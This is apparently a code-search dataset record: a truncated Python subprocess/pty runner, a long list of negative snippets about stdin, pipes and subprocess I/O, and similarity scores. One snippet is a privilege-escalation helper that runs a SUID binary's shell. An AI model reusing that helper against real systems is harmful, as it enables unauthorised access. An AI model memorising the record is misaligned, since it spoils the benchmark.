input\n if not ready and proc.poll() is not None:\n os.close(slave_fd)\n evt.set()\n break\n\n if master_fd in ready:\n # POSIX.1 requires PIPE_BUF to be at least 512 bytes, but Linux uses 4096 bytes\n data = os.read(master_fd, 4096)\n\n if not data:\n # reached EOF, signal data ready in case the queue is not empty, then exit\n evt.set()\n break\n else:\n # put data in the queue and signal the consumer thread\n queue.put(data)\n evt.set()\n\n # wait for ready signal, then read data from queue and save to a buffer\n # once the buffer contains an end of line, send that to a callback if defined,\n # then send the line to a file for later processing\n def consume_queue(queue, filename, evt, proc, callback=None):\n streambuffer = []\n with open(filename, 'w+') as fileobj:\n while 1:\n # wait for a signal at most one second at a time so we can check the child process status\n evt.wait(1)\n if queue.empty() and proc.poll() is not None:\n # make sure the last part of the buffer is written out\n if streambuffer:\n if callback:\n callback(streambuffer[0])\n\n fileobj.write(streambuffer[0])\n fileobj.flush()\n break\n elif queue.empty():\n # the queue is empty, but our child process has not exited yet, so data may show up still\n continue\n\n data = queue.get_nowait()\n streambuffer.append(data)\n queue.task_done()\n\n # As soon as we see an end of line from the stream, we should write.\n # Since we could receive many lines per queue chunk, we want to pass\n # a line at a time to our callback.\n if '\\n' in data:\n merged = \"\".join(streambuffer)\n lines = merged.split('\\n')\n\n if len(lines) > 1 and '\\n' not in lines[-1]:\n streambuffer = [lines[-1]]\n lines.pop()\n else:\n streambuffer = []\n\n if callback:\n for x in lines:\n if not x:\n continue\n callback(x)\n\n fileobj.write(\"\".join(lines))\n fileobj.flush()\n\n command_list = self._build_command_list(arguments,debug)\n\n self.logger.info(\"Executing {0}\".format(\" \".join(command_list)))\n\n stdout_name = 'task_stdout_{}'.format(datetime.datetime.utcnow().isoformat())\n stderr_name = 'task_stderr_{}'.format(datetime.datetime.utcnow().isoformat())\n\n stderr = open(stderr_name, 'w+')\n\n # Use pty to provide a workaround for buffer overflow in stdio when monitoring stdout\n master_stdout_fd, slave_stdout_fd = pty.openpty()\n #master_stderr_fd, slave_stderr_fd = pty.openpty()\n #task = subprocess.Popen(command_list, stdout=slave_stdout_fd, stderr=slave_stderr_fd, close_fds=True)\n task = subprocess.Popen(command_list, stdout=slave_stdout_fd, stderr=stderr.fileno(), close_fds=True)\n\n # force termination signal handling of the child process\n signal_handler = functools.partial(cleanup, task)\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n\n stdout_queue = Queue.Queue()\n stdout_data_ready = threading.Event()\n\n t1 = threading.Thread(target=produce_queue, args=(stdout_queue, master_stdout_fd, slave_stdout_fd, stdout_data_ready, task))\n t1.daemon = True\n t1.start()\n\n t2 = threading.Thread(target=consume_queue, args=(stdout_queue, stdout_name, stdout_data_ready, task, self.callback))\n t2.daemon = True\n t2.start()\n\n #stderr_queue = Queue.Queue()\n #stderr_data_ready = threading.Event()\n\n #t3 = threading.Thread(target=produce_queue, args=(stderr_queue, master_stderr_fd, slave_stderr_fd, stderr_data_ready, task))\n #t3.daemon = True\n #t3.start()\n\n #t4 = threading.Thread(target=consume_queue, args=(stderr_queue, stderr_name, stderr_data_ready, task))\n #t4.daemon = True\n 
#t4.start()\n\n task.wait()\n\n t1.join()\n t2.join()\n #t3.join()\n #t4.join()\n\n stdout = open(stdout_name, 'rb')\n #stderr = open(stderr_name, 'rb')\n stderr.seek(0)\n\n task_output = {}\n task_output[\"stdout\"] = \"\".join(stdout.readlines())\n task_output[\"stderr\"] = \"\".join(stderr.readlines())\n\n stdout.close()\n stderr.close()\n os.remove(stdout_name)\n os.remove(stderr_name)\n\n if task.returncode != 0:\n self.logger.error(task.returncode)\n raise Exception(task_output[\"stdout\"], task_output[\"stderr\"])\n else:\n return task_output", "def subprocess_attach_stdin(cmd, shell=False):\n # type: (str, bool) -> subprocess.Process\n return subprocess.Popen(cmd, shell=shell, stdin=subprocess.PIPE)", "def popenCommunicate(args, data='', outputs=None, ignoreErrors=False, poll_interval=0.01):\n stdError = None\n if not ignoreErrors:\n stdError = subprocess.STDOUT\n p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=stdError)\n fcntl.fcntl(p.stdin, fcntl.F_SETFL, os.O_NONBLOCK) # make the file nonblocking\n fcntl.fcntl(p.stdout, fcntl.F_SETFL, os.O_NONBLOCK) # make the file nonblocking\n\n bytesTotal = len(data)\n bytesWritten = 0\n while bytesWritten < bytesTotal:\n try:\n # p.stdin.write() doesn't return anything, so use os.write.\n bytesWritten += os.write(p.stdin.fileno(), data[bytesWritten:])\n except IOError, ex:\n if ex[0] != errno.EAGAIN:\n raise\n sys.exc_clear()\n socket.wait_write(p.stdin.fileno())\n\n p.stdin.close()\n\n if outputs is not None:\n while True:\n try:\n chunk = p.stdout.read(4096) \n if not chunk:\n break\n for output in outputs:\n output.write(chunk)\n except IOError, ex:\n if ex[0] != errno.EAGAIN:\n raise\n sys.exc_clear()\n socket.wait_read(p.stdout.fileno()) \n\n p.stdout.close()\n\n length = None\n try:\n length = len(outputs[0])\n except:\n length = 0\n\n logging.getLogger().debug(\"popenCommunicate() finished. 
Args: %s, Output Length: %d\" % (args,length))", "def input_pipe():\n x = ''\n while True:\n x = yield x\n yield # to keep the generator in lock step with input", "def send_cmd(self):\n\n cmd = self.repl_input.get().encode()\n self.serial.write(cmd + b\"\\r\")\n self.repl_input.set(\"\")", "def non_blocking_streamlit(process: psutil.Popen) -> None:\n while process.is_running():\n process.communicate()", "def _on_read(self, line):\n # Some game logic (or magic)\n line = line.strip()\n logger.info(\"RCV> %s\", line)\n if not line:\n self.stream.close()\n return\n\n self.stream.write(\"echo: %s\\n\" % line)\n\n # Wait for further input on this connection\n self.wait()", "def dataReceived(self, data: bytes):\n\n if self.output:\n self.output.write(data) # redirect the message to the server", "def run(self):\r\n while self._go.isSet(): #while app is running\r\n if self._check_console_input(): #if something to read on the console\r\n cmd = sys.stdin.readline() #read it\r\n self.inq.put(cmd) #dispatch it tpo the server\r\n response = self.outq.get(timeout=2.0) #wait for an answer\r\n sys.stdout.write(response) #write the answer on the console\r", "def start(self, stdin=None, stdout=None, stderr=None):\n logging.debug(\"Starting '%s'\", \" \".join(self.cmd_line))\n self.proc = subprocess.Popen(self.cmd_line,\n stdin=stdin,\n stdout=stdout if stdout\n else subprocess.PIPE,\n stderr=stderr,\n env=self.env)\n self.thread = threading.Thread(target=self.tail)\n self.thread.daemon = True\n self.thread.start()\n self.running = True", "def watch(self):\n reader, writer = os.pipe2(0)\n\n pid = os.fork()\n\n # In the child\n if pid == 0:\n tty.setraw(0)\n os.close(reader)\n os.close(2)\n\n os.dup2(writer, 1)\n\n os.execlp(self.__program, self.__program, *self.__args)\n\n sys.exit(1)\n else:\n os.close(writer)\n\n while True:\n result = os.read(reader, 1024)\n if len(result) == 0:\n break\n sys.stdout.write(result.decode('utf-8'))\n\n os.waitpid(pid, 0)", "def main():\n dt = DropToken()\n play = True\n while play:\n try:\n line = sys.stdin.readline()\n except KeyboardInterrupt:\n break\n if not line:\n break\n play = dt.inputProcess(line)", "def pipestring_process(cmd_string, stdin_string=''):\n f=SpooledTemporaryFile()\n f.write(stdin_string)\n f.seek(0)\n results=process(cmd_string, stdin=f)\n f.close()\n return results", "def execute_sbatch(cmd_submit, stdin, env, cmd_nbscript): # pylint: disable=unused-argument\n p = subprocess.Popen(cmd_submit, stdin=subprocess.PIPE, env=env)\n p.stdin.write(stdin)\n p.stdin.close()\n p.wait()\n return p.returncode", "def process_data(data):\n bio = BytesIO()\n bio.write(data)\n bio.seek(0)\n process(bio)", "def _launch_command(args, out_cb, err_cb, done=None, **kwargs):\n\n def pump_stream(callback, stream):\n \"\"\"Pump the stream\"\"\"\n for line in stream:\n callback(line)\n callback(None)\n\n def joiner():\n \"\"\"Wait for streams to finish, then call done callback\"\"\"\n for th in threads:\n th.join()\n done(process)\n\n kwargs = kwargs.copy()\n in_data = kwargs.get(\"input\")\n if \"input\" in kwargs:\n del kwargs[\"input\"]\n assert kwargs.get(\"stdin\") is None, kwargs[\"stdin\"]\n kwargs[\"stdin\"] = PIPE\n elif \"stdin\" not in kwargs:\n kwargs[\"stdin\"] = DEVNULL\n kwargs.setdefault(\"stdout\", PIPE)\n kwargs.setdefault(\"stderr\", PIPE)\n kwargs[\"universal_newlines\"] = True # Text streams, not byte streams\n process = Popen(args, **kwargs)\n threads = []\n if process.stdout:\n thread = Thread(\n target=pump_stream, args=(out_cb, process.stdout), 
daemon=True\n )\n thread.start()\n threads.append(thread)\n if process.stderr:\n thread = Thread(\n target=pump_stream, args=(err_cb, process.stderr), daemon=True\n )\n thread.start()\n threads.append(thread)\n if done and threads:\n Thread(target=joiner, daemon=True).start()\n if in_data:\n process.stdin.write(str(in_data, \"utf-8\"))\n process.stdin.close()\n return process", "def _process_input(self, fd):\n if fd.fileno() == self._proxyfd.fileno():\n pkt = self._grab_packet(\n lambda data, s=self: s.create_packet(packet=data), fd)\n self._handle_proxy_packet(pkt)\n else:\n Server._process_input(self, fd)", "def send(self, payload):\n self.emitter.input(payload)", "def rawInput(string):\n if os.name == \"posix\":\n tcflush(sys.stdin, TCIFLUSH)\n return input(string)", "def set_up_ipc(self, data_queue, termination_event, stdin=None):\n\n # Store our IPC primitives, ready for future use.\n self.data_queue = data_queue\n self.termination_event = termination_event\n\n # Retrieve our use of the standard input from the parent thread.\n if stdin:\n self.stdin = sys.stdin = stdin", "def read_stdin():\n return \"\".join(sys.stdin.readlines()).strip()", "def start_stdio_server(self):\n ls = self.language_server(hub=self.hub)\n ls.start(sys.stdin.buffer, sys.stdout.buffer)", "def stdin():\n\n while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:\n\n line = sys.stdin.readline()\n\n if not line:\n yield from []\n break\n\n line = line.strip()\n yield line", "def hook() -> None:\n real_recv = process.recv_raw\n\n def recv(self: process, numb: int) -> bytes:\n data = real_recv(self, numb)\n # Sometimes the returned data is of type str\n # Accept them by converting them to bytes\n if type(data) == str:\n data = data.encode()\n try:\n stdout_all = self.stdout_all\n except Exception: # pylint: disable=broad-except\n stdout_all = b\"\"\n stdout_all += data\n self.stdout_all = stdout_all\n return data\n\n process.recv_raw = recv", "def _process(self):\n\n while True:\n try:\n sockets = [self.master_fd]\n if self.sock:\n sockets.append(self.sock)\n # Don't handle user input while a side command is running.\n if len(self.filter) == 1:\n sockets.append(pty.STDIN_FILENO)\n rfds, _, _ = select.select(sockets, [], [], 0.25)\n except select.error as ex:\n if ex[0] == errno.EAGAIN: # Interrupted system call.\n continue\n raise\n\n if not rfds:\n self._timeout()\n else:\n # Handle one packet at a time to mitigate the side channel\n # breaking into user input.\n if self.master_fd in rfds:\n data = os.read(self.master_fd, 1024)\n self.master_read(data)\n elif pty.STDIN_FILENO in rfds:\n data = os.read(pty.STDIN_FILENO, 1024)\n self.stdin_read(data)\n elif self.sock in rfds:\n data, self.last_addr = self.sock.recvfrom(65536)\n if data[-1] == b'\\n':\n self.log(\"WARNING: the command ending with <nl>. 
\"\n \"The StreamProxy filter known to fail.\")\n self.log(\"Got command '%s'\" % data.decode('utf-8'))\n command = self.filter_command(data)\n self.log(\"Translated command '{}'\"\n .format(command.decode('utf-8')))\n if command:\n self.write_master(command)\n self.write_master(b'\\n')", "def _stdout_reader(self):\n self._is_launched.wait()\n stdout_iterator = iter(self._popen.stdout.readline, b\"\")\n for line in stdout_iterator:\n self._log(\"raw\", \"stdout : {0}\".format(line.strip()))\n self.stdout_queue.put_nowait(line.strip())\n self.stdout_queue.put_nowait(None) # Stop queue consumers", "def start(self):\n # Create a pipe so the stream can be captured:\n self.pipe_out, self.pipe_in = os.pipe()\n self.capturedtext = \"\"\n\n # Save a copy of the stream:\n self.streamfd = os.dup(self.origstreamfd)\n\n # Replace the original stream with our write pipe:\n os.dup2(self.pipe_in, self.origstreamfd)", "def send_serial_command(data):\n print(data)\n serial_command = data\n SERIAL_PARENT.send(serial_command)\n OUTGOING.append(serial_command)", "def process(cmd_string, stdin=None):\n return process_results(process_run(cmd_string, stdin=stdin))", "def read_input(inp):\n epoll = select.epoll()\n epoll.register(sys.stdin.fileno(), select.EPOLLIN)\n while inp.running:\n if is_terminated():\n return\n\n events = epoll.poll(1)\n for fileno, event in events:\n line = \"[\"\n while \"[\" in line:\n line = sys.stdin.readline().strip(\",\").strip()\n inp.has_event = True\n try:\n event = json.loads(line)\n if \"instance\" in event:\n inp.callback(event)\n inp.redraw()\n except ValueError:\n pass\n epoll.unregister(sys.stdin.fileno())\n epoll.close()\n inp.has_event = True\n inp.clean_exit = True", "def read_input():\n\n read = sys.stdin.readlines()\n\n text = ''\n for line in read:\n text += line\n\n return text", "def write_stdout(self, data):\n filt, handler = self.filter[-1]\n data, filtered = filt.filter(data)\n self._write(pty.STDOUT_FILENO, data)\n if filtered:\n self.log(\"Filter matched %d bytes\" % len(filtered))\n self.filter.pop()\n assert callable(handler)\n res = handler(filtered)\n if res:\n self.sock.sendto(res, 0, self.last_addr)", "def write(self, data):\r\n try:\r\n char_handle = self._stdinout_characteristic.getHandle()\r\n bytes_sent = 0\r\n while bytes_sent < len(data):\r\n # Computing data to send.\r\n bytes_to_send = min(\r\n self._MAXIMUM_MESSAGE_SIZE_BYTES,\r\n len(data) - bytes_sent\r\n )\r\n data_to_send = data[bytes_sent:bytes_sent + bytes_to_send]\r\n\r\n # Writing data.\r\n self._node.writeCharacteristic(\r\n char_handle,\r\n data_to_send,\r\n True)\r\n bytes_sent += bytes_to_send\r\n\r\n # Calling on-write callback for a debug characteristic.\r\n self.on_write_characteristic(\r\n self._stdinout_characteristic, data_to_send, True)\r\n\r\n return bytes_sent\r\n\r\n except BTLEException as e:\r\n self._node._unexpected_disconnect()", "def communicate(args, **kwargs):\n stdin = None\n # When stdin is passed as an argument, use it as the actual input data and\n # set the Popen() parameter accordingly.\n if 'stdin' in kwargs and isinstance(kwargs['stdin'], basestring):\n stdin = kwargs['stdin']\n kwargs['stdin'] = PIPE\n\n proc = Popen(args, **kwargs)\n return proc.communicate(stdin), proc.returncode", "def run_process(self, inp=\"\"):\n return subprocess.run(self.binary,\n input=inp,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n universal_newlines=True)", "def recvraw(self):\n\n if self.stdin is None:\n return _python_input_function()\n else:\n return 
self.stdin.readline().rstrip('\\n')", "def threading_copy(self, data):\n r_fd, w_fd = os.pipe()\n rstream = os.fdopen(r_fd, \"rb\")\n wstream = os.fdopen(w_fd, \"wb\")\n copy_thread = threading.Thread(target=self.copystream, args=(rstream,))\n copy_thread.start()\n self.writestream(data, wstream)\n wstream.close()\n copy_thread.join()", "def server_do(self,input, connstream):\r\n pass", "def WriteToPipeIn(self, epAddr, data): \n return self._server.write_to_pipe_in(self._serial, epAddr, list(data))", "def runin(cmd, stdin):\n result = subprocess.Popen(cmd,stdin=subprocess.PIPE)\n result.wait()\n return result.returncode", "def connectionMade(self):\n self._pid = self.transport.pid\n if self._pid:\n self.logger(\"Process has pid %d\" % self._pid)\n self.transport.closeStdin() # close stdin", "def send(self, *args, **kwargs):\n if not self.paused():\n raise RuntimeError(\"Machine is not awaiting input\")\n else:\n self.args = (args, kwargs)", "def collect_incoming_data(self, data):\n self.__input.append(data)", "def execute(self, technique: Technique):\n\n binary = technique.ident\n enter, input, exit = binary.shell(self.pty.shell, suid=True)\n\n # Run the start commands\n self.pty.process(enter, delim=False)\n\n # Send required input\n self.pty.client.send(input.encode(\"utf-8\"))\n\n return exit # remember how to close out of this privesc", "def scan_input(self):\n proc = subprocess.Popen([\"ssh\", \"-tt\", \"pi@127.0.0.1\"],\n stdout=subprocess.PIPE, stdin=subprocess.PIPE)\n # give time to connect\n time.sleep(5)\n proc.stdin.write(\n b\"/home/pi/Desktop/GAssist/env/bin/google-assistant-demo\\n\")\n proc.stdin.flush()\n while True:\n next_line = proc.stdout.readline()\n if next_line != '':\n # the real code does filtering here\n tmp = next_line.decode(\"utf-8\")\n print(tmp)\n tmp = tmp.strip().lower()\n for test_re in self.text_regexes:\n match_test = test_re.match(tmp)\n if match_test:\n self.handle_input(match_test.group(1).strip())\n else:\n time.sleep(.01)", "def communicate(self, std_in=None, timeout=0):\n if timeout <= 0:\n return super(Popen, self).communicate(input=std_in)\n\n fds = []\n stdout = []\n stderr = []\n\n if self.stdout is not None:\n set_file_nonblock(self.stdout)\n fds.append(self.stdout)\n if self.stderr is not None:\n set_file_nonblock(self.stderr)\n fds.append(self.stderr)\n\n if std_in is not None and sys.stdin is not None:\n sys.stdin.write(std_in)\n\n returncode = None\n inactive = 0\n while returncode is None:\n (rlist, dummy_wlist, dummy_xlist) = select.select(\n fds, [], [], 1.0)\n\n if not rlist:\n inactive += 1\n if inactive >= timeout:\n raise TimeoutError\n else:\n inactive = 0\n for fd in rlist:\n if fd is self.stdout:\n stdout.append(fd.read())\n elif fd is self.stderr:\n stderr.append(fd.read())\n\n returncode = self.poll()\n\n if self.stdout is not None:\n stdout = ''.join(stdout)\n else:\n stdout = None\n if self.stderr is not None:\n stderr = ''.join(stderr)\n else:\n stderr = None\n\n return (stdout, stderr)", "def live_network_input_to_pipe(iface=None, p=None):\n\n global g_pipein\n\n print(\"Named Pipe '{0}' has been opened for writing. Waiting for Pipe Reader to connect.\".format(p))\n g_pipein = open(p, 'wb')\n print(\"Connected to Named Pipe '{0}'. 
Writing binary TDMs into pipe.\".format(p))\n\n if iface is None:\n print(\"Listening on default interface.\")\n try:\n sniff(prn=write_tdm_to_pipe)\n except IOError as e:\n if e.errno == errno.EPIPE:\n print(\"Broken Pipe: EPIPE\")\n else:\n print(\"Listening on interface: {0}\".format(iface))\n try:\n sniff(iface=iface, prn=write_tdm_to_pipe)\n except IOError as e:\n if e.errno == errno.EPIPE:\n print(\"Broken Pipe: EPIPE\")", "def run_python_stdin(python, file_args=None, directives=None):\n import shutil\n import tempfile\n\n with tempfile.NamedTemporaryFile(suffix='.py') as f:\n shutil.copyfileobj(sys.stdin, f)\n f.flush()\n\n file_args = [f.name] + list(file_args or ())\n run_python_file(python, file_args, directives)", "def continuous_shell_reader(self):\n\n while not self.thread_stop.is_set():\n out = self.shell_reader()\n\n if not out == \"\":\n print(\"IPC: Received: {}\".format(out))", "def set_stdio(inp):\r\n default_stdin = sys.stdin\r\n sys.stdin = StringIO(inp)\r\n default_stdout = sys.stdout\r\n sys.stdout = mystdout = StringIO()\r\n return default_stdin, default_stdout, mystdout", "def pingAgentProcess( self ):\n try:\n self.lock.acquire()\n\n if self.agent is None or self.agent.poll() is not None:\n return\n\n self.agent.stdin.write( 'hello\\n' )\n self.agent.stdin.flush()\n finally:\n self.lock.release()", "def getch(self):\t # get 1 byte from stdin\n\t\treturn sys.stdin.read(1)", "def send_command(self, command):\n stdin, stdout, stderr = self.ssh_client.exec_command(command)\n return stdout.readlines()", "def send_enter():\n sys.stdout.write('\\x0D') # send carriage return\n sys.stdout.flush()" ]
[ "0.7741889", "0.7658585", "0.76509887", "0.75933856", "0.7503921", "0.7494124", "0.7365971", "0.7141076", "0.7000852", "0.6967747", "0.6881967", "0.68283165", "0.67600954", "0.6745928", "0.6668038", "0.6605815", "0.6481066", "0.64001137", "0.63949114", "0.6270043", "0.62556726", "0.62385255", "0.62025994", "0.6056685", "0.60175997", "0.6017262", "0.60026217", "0.59912366", "0.59847766", "0.59403116", "0.59341747", "0.59310734", "0.57677084", "0.5744669", "0.57191944", "0.57078475", "0.56990546", "0.56922996", "0.5688699", "0.5655805", "0.5649605", "0.5644868", "0.5624177", "0.5615417", "0.5592042", "0.55821157", "0.5565265", "0.5562639", "0.55599725", "0.5550713", "0.5526504", "0.5524541", "0.5524397", "0.5510715", "0.5508886", "0.54894966", "0.5480219", "0.54717577", "0.54670256", "0.54628044", "0.5445239", "0.54445964", "0.5417918", "0.53983766", "0.5393377", "0.5381578", "0.53750676", "0.5356832", "0.5355164", "0.5348384", "0.53448707", "0.5333086", "0.532736", "0.53266007", "0.5310466", "0.53100234", "0.5308773", "0.5300952", "0.5290379", "0.52886134", "0.52848065", "0.5284658", "0.527753", "0.527496", "0.52652955", "0.5259584", "0.52565193", "0.5255935", "0.5255432", "0.5253667", "0.52493566", "0.5249049", "0.5248646", "0.5247048", "0.5233346", "0.52290374", "0.5220966", "0.52144283", "0.5200266", "0.51953036" ]
0.65630895
16
Send a signal to the process
def sendSignal (self, signal) :\n\n        data = streamModule.WriteBuffer()\n        data.writeStruct('B', signal)\n\n        return self.sendCommand("CMD_IN_DO_KILL", data.getvalue()).addCallback(self._sendSignal_result)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def send_signal(self, sig):\n os.kill(self.pid, sig)", "def send_signal(self, signal):\n self.kill()", "def send_signal(self, sig):\n if self.thread.is_alive():\n self.process.send_signal(sig)\n else:\n lg.warning(\"Couldn't deliver signal \"\n \"to already dead process {} ({})\".format(self.command[0], self.process.pd)\n )", "def signalProcess(self, signal, name):\n if name not in self.protocols:\n return\n proc = self.protocols[name].transport\n try:\n proc.signalProcess(signal)\n except ProcessExitedAlready:\n pass", "async def send_signal(self, signum: int) -> None:\n signal_delivered = await self._send_signal_via_listener(signum)\n if not signal_delivered:\n # Fallback\n # if we have a local process, use its method, else determine if the ip is local or remote and issue\n # the appropriate version to signal the process.\n if self.local_proc:\n if self.pgid > 0 and hasattr(os, \"killpg\"):\n try:\n os.killpg(self.pgid, signum)\n return\n except OSError:\n pass\n self.local_proc.send_signal(signum)\n # else:\n # if self.ip and self.pid > 0:\n # if ip_is_local(self.ip):\n # self.local_signal(signum)\n # else:\n # self.remote_signal(signum)\n return", "def send_signal(self, sig):\r\n sig = { 0x01 : \"HUP\",\r\n 0x02 : \"INT\",\r\n 0x03 : \"NEWNYM\",\r\n 0x0A : \"USR1\",\r\n 0x0C : \"USR2\",\r\n 0x0F : \"TERM\" }.get(sig,sig)\r\n self.sendAndRecv(\"SIGNAL %s\\r\\n\"%sig)", "def signal(self, args):\n pass", "def send_signal(self, signum):\n if signum == 0:\n return self.poll()\n elif signum == signal.SIGKILL:\n return self.kill()\n else:\n # This is very likely an interrupt signal, so defer to the super class\n # which should use the communication port.\n return super(ContainerProcessProxy, self).send_signal(signum)", "def handler(signum, frame):\n m.signal()", "def signal(self):\n self.mainloop().signal()", "def signal(self):\n pass", "def kill(self, sig):\n\n # we parse the signal at the client level to reduce the time we pass\n # in the server.\n signum = parse_signal_value(sig)\n\n body = json.dumps({\"signal\": signum})\n self.server.request(\"post\", \"/jobs/%s/%s/signal\" % (self.sessionid,\n self.name), body=body)\n return True", "def signal(sig, action): # real signature unknown; restored from __doc__\n pass", "def signalProcess(self, signalID):\r\n params = {\r\n \"TERM\": (self._terminationDelay, 0),\r\n \"KILL\": (0, 1)\r\n }\r\n\r\n if self.pid is None:\r\n raise ProcessExitedAlready()\r\n\r\n if signalID in params:\r\n delay, status = params[signalID]\r\n self._signalHandler = self._reactor.callLater(\r\n delay, self.processEnded, status)", "def send_signal(self, sig: int = signal.SIGKILL, children: bool = False) -> Task:\n if self._process and self._process.pid is not None:\n kill(self._process.pid, sig=sig, children=children)\n return self", "def signal_handler(self, signum, frame):\n self._running = False", "def signal_handler(signal, frame):\n print()\n endProgram(0)", "def kill(self, signal: Union[str, int, None] = None):\n params = dict()\n if signal is not None:\n params[\"signal\"] = signal", "def test_signal_interruption(self):\n process = Popen(\n [STRATIS_CLI, \"pool\", \"create\",\n p_n(), DISKS[0]],\n stdout=PIPE,\n stderr=PIPE,\n close_fds=True,\n env=os.environ)\n time.sleep(0.05)\n process.send_signal(2)\n result = process.communicate()\n stdout_text = \"\"\n stderr_text = \"\"\n if result[0]:\n stdout_text = bytes(result[0]).decode(\"utf-8\")\n if result[1]:\n stderr_text = bytes(result[1]).decode(\"utf-8\")\n\n self.assertTrue(\"Traceback\" not in 
stdout_text)\n self.assertTrue(\"Traceback\" not in stderr_text)\n self.assertNotEqual(process.returncode, 0)", "def sighandler(signum, frame):\n global _terminate\n global _interruptcnt\n print >> FileKeyUtils.WMSlog, 'sighandler> ', signum\n ++_interruptcnt \n if signum in(signal.SIGABRT, signal.SIGINT, signal.SIGTERM):\n print >> FileKeyUtils.WMSlog, 'sighandler> terminate pid: ', os.getpid(), signum\n _terminate = True\n elif signum in(signal.SIGHUP, signal.SIGTSTP):\n print >> FileKeyUtils.WMSlog, 'sighandler> suspend/stop/pause pid: ', os.getpid(), signum\n signal.pause()\n else:\n print >> FileKeyUtils.WMSlog, 'sighandler> resume/continue pid: ', os.getpid(), signum\n _terminate = False", "def send(signal, *args, **kwargs):\n _dispatcher.send(signal=signal, *args, **kwargs)", "def cli():\n signal.signal(signal.SIGINT, signal_handler)\n pass", "def signal_handler(signal, frame):\n output.write(\"SIGTERM received (launch_simulations talking)\\n\")\n p.kill(15)\n sys.exit(1)", "def signal_handler(self, signum):\n raise Exception(\"Caught signal {0}\".format(signum))", "def _signal_handler(*args):\n self._user_exit = True", "def handler(signum, frame):\n print(\"Signal handler called with signal %i\" % signum)\n sys.exit(-1)", "def _signal_handler(*_: typing.Any) -> None:\n shutdown_event.set()", "def send_signal(self, signal):\n if self.in_spectator_mode: return None\n logger.debug(\"Node %s broadcasts signal %s\" % (self, signal))\n dispatcher.send(signal=signal, sender=self)", "def signal_handler(signum, frame):\n sys.exit(0)", "async def _send_signal_via_listener(self, signum: int) -> bool:\n # If the launcher returned a comm_port value, then use that to send the signal,\n # else, defer to the superclass - which will use a remote shell to issue kill.\n # Note that if the target process is running as a different user than the REMOTE_USER,\n # using anything other than the socket-based signal (via signal_addr) will not work.\n if self.comm_port > 0:\n signal_request = dict()\n signal_request['signum'] = signum\n\n try:\n await self._send_listener_request(signal_request)\n if signum > 0: # Polling (signum == 0) is too frequent\n self.log.debug(\"Signal ({}) sent via gateway communication port.\".format(signum))\n return True\n except Exception as e:\n if isinstance(e, OSError) and e.errno == errno.ECONNREFUSED: # Return since there's no process.\n return True\n\n self.log.warning(f\"An unexpected exception occurred sending signal ({signum}) \"\n f\"via listener for KernelID '{self.kernel_id}': {e}\")\n return False", "def signal_handler(sig, frame):\n raise ExitException()", "def _signal_handler(signum, frame):\n res_mgr()\n sys.exit(0)", "def kill(self):\n self.send_signal(signal.SIGKILL)", "def signal_handler(self, signal_number, frame):\n sys.exit(0)", "def signal(self):\n assert self._pa_threaded_mainloop is not None\n pa.pa_threaded_mainloop_signal(self._pa_threaded_mainloop, 0)", "def __before_termination__(self, sig):\n print(\"Ahhhh! I'm going to be killed. 
My pid:{}, signal received:{}\".format(self.pid, sig ) )", "def handler_sighup(signum, frame):\n global done, pipe\n\n try:\n pipe.flush()\n pipe.close()\n except:\n pass\n pipe = None\n done = True", "def _signal_handler(signalnum: int, _: Any) -> None:\n logger.info('Received signal: {0}', signal.Signals(signalnum).name)\n # safely close video stream & writer\n stream.stop()\n writer.close()\n sys.exit(0)", "def signal_handler(signum, frame):\n main.CLOSE = True", "def kill(pid, sig=signal.SIGTERM.value):\n pid = int(pid)\n sig = int(sig)\n proc = psutil.Process(pid)\n try:\n proc.send_signal(sig)\n return True\n except Exception as e:\n raise j.exceptions.RuntimeError(\"Could not kill process with id %s.\\n%s\" % (pid, e))", "async def remote_signal(self, sig):\n\n username = self.get_remote_user(self.user.name)\n k = asyncssh.read_private_key(self.ssh_keyfile.format(username=self.user.name))\n\n command = \"kill -s %s %d < /dev/null\" % (sig, self.pid)\n\n async with asyncssh.connect(self.remote_host,username=username,client_keys=[k],known_hosts=None) as conn:\n result = await conn.run(command)\n stdout = result.stdout\n stderr = result.stderr\n retcode = result.exit_status\n self.log.debug(\"command: {} returned {} --- {} --- {}\".format(command, stdout, stderr, retcode))\n return (retcode == 0)", "def signal_handler(sig_num, frame):\n global exit_flag\n logger.warn('Signal Recieved: {}'.format(str(sig_num)))\n if sig_num:\n exit_flag = True", "def signalProcess(self, processTag=None, event='cancel'):\r\n if processTag is None:\r\n self.mutex.clear()\r\n while not self.asyncQueue.empty():\r\n self.asyncQueue.get()\r\n self.asyncQueue.task_done()\r\n while not self.syncQueue.empty():\r\n self.syncQueue.get()\r\n self.syncQueue.task_done()\r\n toQueue = [PROCESS_MESSAGE, None, None, [], {}, self.processMessage()]\r\n for k in range(self.activeWorkers):\r\n self.asyncQueue.put(toQueue)\r\n return\r\n elif processTag not in self.activeList:\r\n raise Exception(\"%s is not an active process\"%processTag)\r\n cancel_event, wait_event, outProcessor = self.activeList[processTag]\r\n if event == 'cancel':\r\n cancel_event.clear()\r\n elif event == 'wait':\r\n wait_event.clear()\r\n args = (PROCESS_PAUSE, processTag,'Proceso pausado')\r\n kwargs = {}\r\n outProcessor(*args, **kwargs)\r\n\r\n elif event == 'resume':\r\n wait_event.set()\r\n args = (PROCESS_PAUSE, processTag, 'Proceso reanudado')\r\n kwargs = {}\r\n outProcessor(*args, **kwargs)\r\n else:\r\n cancel_event.clear()", "def signal_handler(self, signum, frame):\n if signum == signal.SIGINT:\n self.terminate = True\n elif signum == signal.SIGALRM:\n self.button_handler(self.BUTTON_PIN)", "def signal_handler(signal_number, stack_frame):\n if signal_number in [signal.SIGTERM, signal.SIGINT]:\n terminate_surveillance()", "def signal_handler(sig, frame):\n sys.exit(0)", "def __signalHandler(self, signalNumber, frame):\n self._loop = False", "def send_signal(self, dst=\"any\", tag=None, value=None, src=None):\n self._signal_pool.signal(src or self.name,dst,tag,value)", "def _sigint(self, signal, frame):\n self.disconnect = True\n if self.cardinal:\n self.cardinal.quit('Received SIGINT.')", "def kill(self, signal=None):\n\n return self.client.api.kill(self.id, signal=signal)", "def signal_oi(self):\n pass", "def signal_pid(pid, sig):\n try:\n os.kill(pid, sig)\n except OSError:\n # The process may have died before we could kill it.\n pass\n\n for i in range(5):\n if not pid_is_alive(pid):\n return 